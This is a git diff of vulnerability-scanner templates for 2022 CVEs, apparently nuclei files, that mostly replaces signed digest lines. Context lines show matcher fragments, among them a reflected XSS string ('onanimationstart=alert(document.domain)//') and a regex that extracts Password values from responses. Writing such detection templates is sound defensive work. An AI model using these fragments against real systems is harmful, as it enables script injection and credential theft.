newline at end of file +# digest: 4a0a00473045022100f66693ec490c67edad9951389cc345616404a66cd30fe4c01b8e6a480213c89902207884268f4572ca2d4de2cf6189f994d1592968d617e1171dd1c8390598557fe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index e87dff8fb3..2a5318cacd 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -77,4 +77,4 @@ http: - '' internal: true part: body -# digest: 4a0a00473045022008a3770822e57b09d41ac02e4e8fb24a8d4ae12e02479ea7fba6c5a50919789a022100e7d5afd4414fd130081f474df96ee4a0f3b609a7d5e683b618acba7031af8323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b2a548c5526e06565ede6b31dec394968ae49e92e911f9c3b895a967aa6b9d710221008fca32c04e5b0118fad8d67392dd3458f800c555df646fd1ceb93919c796b35d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 42de1b227b..07dc5b0c16 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e403fa95c8208dca72c7387425cba8c129e7dfa20d8dab4a96911b406fba2cc1022048e179973aa2f40b253ff07bb159c86d5da40b59437535549c3ee912cc28f201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d822dff0574465d8a236c0a3870120599040c4db420b664f999ee7a8bd85a4c022100ac896d98c593e565e87bb82d39c3db64677b4fb25123f2bb215adda4397be8ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index 60a6709c6f..80ba951e59 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206d4c2cf954be9043250ab16a537e7ef2675f66c8ba097f50d00faccf56e535f5022100921f7c12c1750864df6c558bcfbaf3b6796d0eeba2782990b6e5755840d26fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b603767072813d1d972d5734a85e2484bc7f20d4410824e0eb190c8aa6a8cb33022100a1a523dad3c7a19c97cfdc520d66be3d136c6cdd093ce3e8e757f9a83f0b6eef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index 1e65f7cf2a..999661ce06 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022055880a1d2bd6c83c488dd0360a5e4c17e959313d13984eb03f1acbb91d91486e02202fa6c8f1c60e3b6aa7804866b86adead45cd8933590438437a1263b8e20319c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f51d34e60e24572e53cca55a63fc56858713ebaa30f1c8f90425d33757b4f9b9022100d8c7a253b77a98d64f858300650effefd11d7c674865afec60ae7545b4bdeca4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index bccd71b102..2588d2fd9f 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100d2611a4bbd37c92e10c7c04c5287817c5276dc06e9595aa43f4c7e2d7f9d6f32022100e8b1382edb51ac7f80e2006d4ef501e49d529af2ea63b39cb9842b574f17f6db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201db80c5daae7962f88a3650a7260e0d4ff08b91cb3a3f18dc558c2bf525d40a702205f244cd37a1a7b7b43f61de7bd12c19c0ad397946f36f6dd0196b105f4c201fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index 17be50d07e..4d537b973c 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "ee-simple-file-list")' - 'contains(body_2, "onanimationstart=alert(document.domain)//")' condition: and -# digest: 4a0a004730450221009b8058e2d09fded7acc96d56479398cd66ad473245c9a0aedcd58109aade3dc502204b7c40619880f5fc9c9742dedc31da8c5ec37f59fe121a562c11d2884098bb5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205105897f44d3816c47769c41fc4f3e93973ada3af56d974861f4e7935c3a85eb02203b4ec0b0e762749d37c743f15a512487d8019f7dc0a6b62066555b4449038171:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index be13eda8b4..d0de8e9479 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c82f1ca657f09b291726404df01aebad442149a633e659a5ac883843d2731477022100941da06ae2c61be7bd56f19c40662273ad5d0668821e4da881f35ffce57e9022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index 0d7912c735..75745cda14 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220193f90816efc79d2ac468c37e58a42add449c9c53f48ed07934c74f756d9550d022100bc87714095325fe51d81827336aa365718a61f67c95e590fea50198ba245e3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220634b81869df2bf0db593182910f955450fa2f12d30aaee90acfadbb3286cd88b022100c42dca46f190441bfb161586423325d0d9db357848c64655dce0f970052d11a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index 4c28485bfe..a0d248be53 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022035556f4f3cd81f9c1bc3e3f30b1581e866314ebc8a754dc6d59d7454b6bd68dd02210091e38ffa5218626fa5a430bdff1748cf16744eb74873df46f70e9fca805896c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b62ee1fc2b390ceedb98cf2c4afd3197761c422ed124b50731699ea4fc630c8022100b29bb172311fa5f266e4cc22925d9cedb496625617690c4998424a99466f7872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index bb46253f20..3df8c7c7fe 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e2e1fcaa58d2dee7545ceebd7a5676ce15a39fc9158480ee7246e0b44b801c19022100bd5e8b3b6dea5d148c40a77c6183f6e003c34e77f22ac9d017f7b00b202f9952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074bff597a7bd921590811d09452dde5bbc69ffe1e382bc206471581e35a995230220300b8fb359c3f27c62cb5b7c60b73089dca648fc900c4da96f09859f1e57684b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index e3a3702a31..84f1d81054 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -60,4 +60,4 @@ http: - type: regex regex: - Password='(.+?)' -# digest: 4a0a004730450220211b8b052d35c8c0e6a761490e6c1b685d1d56b894054fd40f62eb2b07c5ffa8022100a1cd1709ff09731bac0575fa634a80cf43322d879c77cd786771c0de881a2f50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfa874c9fcc0869f067c98760eca4e1d0663d7543862826e233a53d3eba4a17502201d2069ee57f63c3a10df5dce882a57b4b7a8d16215910078bdc998bde72b6728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index 37e7f0d9d4..8590a9e9ab 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e198facad20dc156feda279d1ce49117cb3d0baf80f67f7e1309efc885bbfe0e022002895be93b1e631fb4d53c0c2f701b0db0afe312b24eca373958d7eb78c65b88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202dff58767b787b7b639f7569d4423daf863148beaf088a6a9349f37a857155620220700c4a0ab6535260a55a62d87338a1dcb2f37b1ba0c273a1af6d4b1b271cf2e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index 90ee57503b..418d12f78e 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "NEX-Forms")' - 'contains(content_type_2, "text/html")' condition: and -# digest: 4a0a0047304502205b7faf48f4f1f5800cf6e79acf865fd5728af61add5cb2e3d656eab6c6a58cab022100be6bb84cb11f81bb21838b305a5137642c88f1f2c754b41bd8c067ae4eda6f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005854ebaa443b16f3f41e3782b2ee5a1f6b482d463dfc3a422877fd53842740b022100b2d2b410318fe04b6e4f42512938d230696fffc7ae75ff604c61d35deceffa88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index b4535f5091..7ba5b1420f 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -49,4 +49,4 @@ http: - status_code == 200 - contains(body, '{\"CardNo\":false') condition: and -# digest: 490a00463044022053c6c0b414614939f1d2b380003b62e3c5c2ad61ebb65e15a4655208c25c77ac022019921227f71829241115d45ac485c1a8d6378801ec680e5c9dc2b0ac2f7ebd44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fa756991c824d75f54e7ab7d21a442da31e45c1e7ef3f353c4caf8cfd0a7eca022100960d6a4ed91938e77a67967bbf589e86f0ba96b8419323af2ee2c99d3e736dfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index 0fb55b42d8..868f59a5de 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203fc99ab76b85fe7af4c15382225072a02b8545f4dcec877333d9a9111e35ecca0220299ac713abf18e223cc14b635004720ca4bf1bc1ce09b5add49a3dc3ab98cd3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6f839aa07c291bcf634657c72c8b9d073ad71f8b899ad14dcf441dad5ba7992022100a13e181c5d976e18ae140c9bf7e3bf94671fa0011b59e452e2d1a48c0e93eb1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 6da156ed2b..7d4a8910b2 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202b941581c6f68df980a8270b98dd682d5d4d930e77ed81d8c35c21b892d9a6dd02203a358f1b032aaf21786d73f91dd64abf62f5a234c1350ac6645838da8a471757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb608d3c7606444f4d69cb86e3798c329381935f7ce2b8f597db966538470478022100b2a3625ef714bb2445f277bfeba155bfadeedf3b024167a2a444ed73a9ab335c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index ba09e64ef6..70740b75d8 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -56,4 +56,4 @@ http: part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" -# digest: 4a0a00473045022100ba04d468e5a36b316af5cde0bdfdce8d0e404952c265bdef97fb533f492ecc530220344972954e1c9bedcfeea63f373297c16cf7a9cf1c8cd580f99a97a6662fbae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022061419438c8476d852bc22439b5c66b71568aad15d15612a46c47e36f01fe39480220765d71411609420dc5e405527ddf064c99aebf007b49df48f136a41430a61e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index a0a73f46e6..a052ca9bf8 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220320f5afe5b1b728587b2540cc0f8d5f61452ff54c986c8f7eadc1856f0a905ec022100d8f3ff9a7705d462d45e1199ba0ee430e88585bafcfc874820c5f88ddc76dbcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100991d2a3d15ef7d8f4bf9e9c7e600f7251f7d6894facb0f74b95a751e8c0a276e022100e4453b11ed4b542538dbf80a3f7483fe26d45351fda80946ee0f0848ad4d70ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index 35cedf4b58..0558a8bf2d 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b9cd4b97ec4bf8df3c4a6c42dd322e42e6b9775243e3e0d725974ef0a3ba64c0022100f77e80b869527ee2c9ea6cae10ddb889a57d738ce645695ce451f64db8a8eae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b7d2abc2478879f4c7d2fe00975606179fa0216d985b54ca70cf12a3711006d02204dd00dd4f1118a8264beda2398cdee9f28f6d25b9a5011ab116b6b05bba0bbcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index b97b3dc4a2..de254b0f4b 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202db1124164825b434395a0b2ed0eaadb8991a9b259a4aca81bd4c657793b8da0022100d3a817be0f73d3bf46078f8483bf8c513a3047485830b59564d7d136ce67632e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf632e6f4e2be66b5072e4d4fb65789927db670551a3b6bf36cd884c9a3be79f0220530a440be7f1e53d5f03b2305218bc0620f63f4f61bcd54517164a60896f2a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index 6ca41201a2..82e1c2c09f 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -92,4 +92,4 @@ http: regex: - name="CSRF_token" value="([0-9a-zA-Z]+)"/> internal: true -# digest: 490a0046304402200fc44f8569c5b730415b2491b31a8709cd4a5c096a8e8dd650d1d58108709768022004858ff3b8255a696b01d2443eaf22d347e26d244a63611c77aee1c00133b538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b7aff62a84e4d74dfe0abefbe9ee6103c0ad1dc7a970a049eb98aa5d5841e53022100b8e80b19776099cfc3452a641dd41a3d64f1e5b6636842044c2d6628ec9a32e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml index 182a1275bf..65e844b0f9 100644 --- a/http/cves/2022/CVE-2022-31879.yaml +++ b/http/cves/2022/CVE-2022-31879.yaml @@ -48,4 +48,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Dashboard")' condition: and -# digest: 490a0046304402200b95b388c981218ff2010a5af1002d6e6eccdcf8edf8a660ea9c6ce4483c07d20220773161e78dd1caf3ee58849de5a6107b7470729bdf71f8122d9bd4e60641cbe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100813a074dda781c0eac1c568a26f0ba914c29ec80c80fa7735148e7af57dc3cd0022100ec9b4331c556899825042e75cb937f5db6dd4b0c2a8166e17e3d466a2ac11256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index 27911724e1..ec141727a6 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and -# digest: 490a0046304402201c4e60b074ac073a47975a8d5098836fb4c229bc87513c05560b4e47c9b4a51d02201ce26a4554f2a66d0e4c8b00935d1587d66475498c0f538584c8099e981a9a46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009fa6f232ca381fb48226af4f083b029784580c4493e408d9152aa86b7fb5ba5b022100d094117a170ce4c1655d880e71f71e166a758c6e334fc23ea1ff6d7bdfc16bd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 500501c96a..3c709a5b58 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and -# digest: 4a0a00473045022100a3ea459a9ffb2cfecef3b00300e5e65a75669bec415a481218447c92d129345402203e0b8a16ac80e4fb7948d2c418a4745685d3d2b8b3e29760b858effcf3b864e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2966f5956585a0efaed31f9b22d39292f964f765ebb98c246982f0c551f5e5602206febf87ebf0b52ed1758f4d39e21b4a8cabf1a463fb7ae53ff7db96e83e7b2bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index 2b627f8a44..e39d07ae88 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -42,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Control Teams")' condition: and -# digest: 4a0a00473045022100d2b77265247a844a543151ac19f0fe136cefd62457e9c581791c7336c9fa50b002200fc31e19654ac1e011b7104483458e1e4e86216cb0c341d0833cf50fce833ce1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d65b2d7292abe523b4dc1d6438eaab7a214662256779f7eb3c0bb76b8747d5e50220050bf41ca7a3b23c0054e85bf5aa2bf734b36b2a69ec82c38a61e68fc2d507d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml index 37e248af3b..71c27b9277 100644 --- a/http/cves/2022/CVE-2022-31983.yaml +++ b/http/cves/2022/CVE-2022-31983.yaml @@ -44,4 +44,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Request Detail")' condition: and -# digest: 4a0a00473045022100dda1b407e3946a8d08dfe8a4da98bf95b77bfae535eb9499bc7f8d5cb0a06d740220401b92b24b02946161684222dbac0c6812a97c86916ab5ccdaffcd491809fcde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204af8863950057b32e9684b9023e7884d1a76824a27e8591e296376788d9565e302202866cbbcb967e8a82db30b5e44ca11175311f2f73222aa124aafe5a17f3f4069:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index a4aa7c052e..82fb4784f2 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c27b0c9f46ef199d8a55356b8e1c6b8e6d55e3e55a7328af4b676cf6d33f3be502205b712981499f0d873739591c3fe20fba293ffe5b84d29e3fe4d229bbbb989a2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220389add9cc6b1a640e2282894dbc596ff61dffa9a00cc8035e534238d115157c6022100de0abc2017d0e7c41ec520e3e0093879ae26f9d21fc1a65624111024ad5f0ca8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index 2a6425936c..d85ed636e1 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -39,4 +39,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4b0a00483046022100c34036939ef2413c02af88cb8e86ecd6b3be7f27866b7d0ca21d3b7a269e47a8022100cf88f059ea7f102348f18a69cc9b78e11fc69e56a09b123e5a590fee4b261619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085cb8c9286ed2f082b2d94a0fac1db9a1a72bde17b1993612daabea94ed932e102207a5b3fa79fc645f8a7eb241015e6c629e6da56d56d1232a311985e5c86a08baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index 5ec3f75e1f..32de97c276 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -41,4 +41,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a0047304502205ba4dd1e28ba762599b6a5ab360d76fec10ab36095eea39b5350f66c6ccfdd4a022100e512574c97e4dd07fb068fe1ad699e8401d927211f5932a38f70608192d06c77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220274e1c830c446e7ad458aa58b4574b603243d7e4a6bf1a021cd176736e3d5d190220403b0f84d5c64361bfd093fd9213351f4d03ad12b6d023ee595239f95da8a149:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index ded26d3ae3..6bd1441b08 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220725a329ba41785dd96c0939334b9a1e78af7fa6421aeef4df6d2dd933c44115c0220351e53b8bd40ec2dea1271b2162432124266cbf982ff3f9fc1eaf8903b8207ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b573b3b71a7368accdd53e018b719df433191e3455776ebaffe52024e416174c022100c17877e7ed7d322bee3f8e60160f7600bd95ab237a13dc8834c2bd7ab21bfc09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index fc46e42229..725eae45a2 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203b4e45ad6997926ec06328175be051f4173ad99349811ce498ebfabf77cfadec022100ebd9ee62670283e68f73cff5756332ebb4f4b7d010c5a102bcdfa61f6967c540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ecf76af5f39d77161eb9d6918babcf47989dc5727e90b38ed4e25be094f7281022100abc7ded4a7f3b083fa662c8c22e9f0440dfe931fc3be6c4d379573d51600f7c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 578029f2fa..4783617bb6 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220566cc50ee5f50c4a96f3e96207530f5e6f169affed02f065aecacbfec179891302202c5e77606826ec2964e65a363ae6cb5339c0746c36c2faf2c312ebba75307610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b2d5cb85142b1144dd6054bb80870e446047c7b799b4be0d47acb34650d3cdf802200cd5e9859ed165bfbb7060c1273bf8aabe4878bf80ba40cd9cbf3e80a5171ea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index defbacfc5e..1bebc48cda 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d8d1ce0a8afb0fd0d8764c020301f0bed489c76f1e00e810d5e77dcb9065adb0220745a0985676455f645e3f98ac502002ec5c0ee377c9822b23ec2081b0c2bfd3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8ecc7eb539922392b444de3befc31151565d5d517fe639b2d39dfe287bfa519022021858fc6ea793ea95aca5f933240ee25abeb4170f9f7c2665fe4dfc49fdd3cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index 0abfa87623..ce53554b2b 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100df821f457de97d0880a4be9f79b9a08294cffaaf8b36b5f573415af2fcc073ec022100c1bf7e95967be2f3096198251b61f794654b302d661afc789ad82c93f886f2e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c7362dc0ba41b772a9b4f7585fe264baa1f4ac8578c12a222c6e85338c1b083802210086735ba9741b4a1e16e0ca1c0e9ac07f6f8cd91b47bb20ecb94ebeefab395b3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 38aa8ee5c5..49fc8166af 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210084fb69c1a03081213ac49cd95c8961662947511ae874b68981e489142096f3a3022100bc20375d33139ca01dac35f08cfcf15bd4ebd45605b6e478d37fd6fb506091ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa5469052f4e8056be48d8c05c1e4309238d8b8316ad85a2fe4a798ed340f827022100e86c33434fcea45477a25840c43d0fdd301dbc3a308aa1c0a3d9b95134e6cb33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index 60b8b5b9f5..c56b304eae 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d1e44091a63188927cbb7a9f6b8d42e7480fcfe75384863173fdee98142046c002210080ce0e4cfa487b2b08f8891139e605f8293b0b80a4250b609f1c9ff37505ffb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 